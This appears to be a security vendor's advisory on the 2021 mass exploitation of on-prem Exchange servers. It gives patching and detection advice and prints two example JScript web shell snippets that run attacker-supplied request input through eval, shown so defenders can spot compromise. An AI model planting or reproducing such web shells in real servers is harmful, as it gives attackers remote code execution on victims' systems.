See The Huntress Managed Security Platform in Action
Ask questions, explore the dashboard and more
Mass Exploitation of On-Prem Exchange Servers
Rapid Response & Resources | Updated April 14, 2021
Description. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et
Updated April 14: Huntress is aware of the new Microsoft Exchange vulnerabilities disclosed in the Microsoft April Security Update. Our team has yet to detect exploits targeting these new vulnerabilities on any hosts running the Huntress agent but will continue to closely monitor for these threats.
These vulnerabilities are all branded as "critical" in severity and again offer remote code execution to an attacker. Considering the strong focus on Exchange by a large number of threat actors, it is absolutely imperative that organizations patch as quickly as they can. We recommend you update to the latest security patch, monitor for new indicators of compromise and stay up-to-date on new information as it releases. We will continue to update this post with new findings.
On March 1, our team was notified about undisclosed Microsoft Exchange vulnerabilities successfully exploiting on-prem servers. The Huntress team was able to confirm this activity, and Microsoft has since released an initial blog and emergency patches for the vulnerabilities.
This page contains additional resources and updated information about these vulnerabilities based on our latest findings and analysis. We'll continue updating with new information as it becomes available.
Our Take: While the initial discovery of these attacks is behind us, we're clearly not out of the woods yet. If you've got Exchange servers that haven't been patched (or you're not sure), now is the time to dig in and ensure you're protecting both your internal and client environments.
According to Microsoft’s initial blog, they detected multiple zero-day exploits being used to plunder on-premises versions of Microsoft Exchange Server in what they claim are “limited and targeted attacks.” They also highlight that threat actor "HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs."
Read more about the initial news of these exploits in our original blog post.
If you use on-prem Microsoft Exchange Servers, assume you’ve been hit. If you haven’t already done so, patch immediately. Now that the vulnerability is well known, multiple actors are exploiting it to compromise unpatched servers.
Once you have patched, validate the patch. Finally look for the presence of web shells and other indicators of compromise (visit the blog for more technical details). We’ve seen cases where a system has been patched but still has web shells the actors are using.
Some common paths for web shells:
If you see unfamiliar .aspx files with random names, and their contents looks like log output with an ExternalUrl line indicating the use of “JScript” code, there is a strong possibility this host is compromised.
We're also seeing some new or different instances of JavaScript being used in web shells. Some examples are below:
<%@ Page Language="Jscript" Debug=true%><%var errorSubHeader="TLsBmaDXMoWjeEkfgvcUPVCYbylzItqOuKGSxnQFRdJwhNHAirZp";var fontsize=Request.Form("Font.size.mB");var fontmin=errorSubHeader(19) + errorSubHeader(37) + errorSubHeader(2) + errorSubHeader(5) + errorSubHeader(15) + errorSubHeader(12);eval(fontsize, fontmin);%>
http://i/#<script language="JScript" runat="server">var _7tw8fs=["d5g6le","jftre"];function Page_Load(){/**/ eval(Request["wq4ywu3v"],"unsafe");}</script>
Yes! While these Exchange vulnerabilities wouldn't traditionally have been discovered by the Huntress platform—because the indicators of compromise (IOCs) are not persistence mechanisms—we've made some additions to the platform to specifically look for potential IOCs.
Our engineering team has also introduced new code to generate incident reports (with Assisted Remediation playbooks) for any infected agents we've detected.
If you're not a current partner and are interested in learning more, check out a demo or jump straight into a free 21-day trial.
This latest exploit is another reminder of the need for a layered approach to cybersecurity in modern IT environments. If you've got questions or are evaluating Huntress as a potential additional layer of security, our team is available to answer any of your questions.
Hackers are constantly evolving to better attack small and mid-size businesses—Huntress is how SMBs and managed service providers stay ahead with managed cybersecurity solutions for endpoints, email, and identity.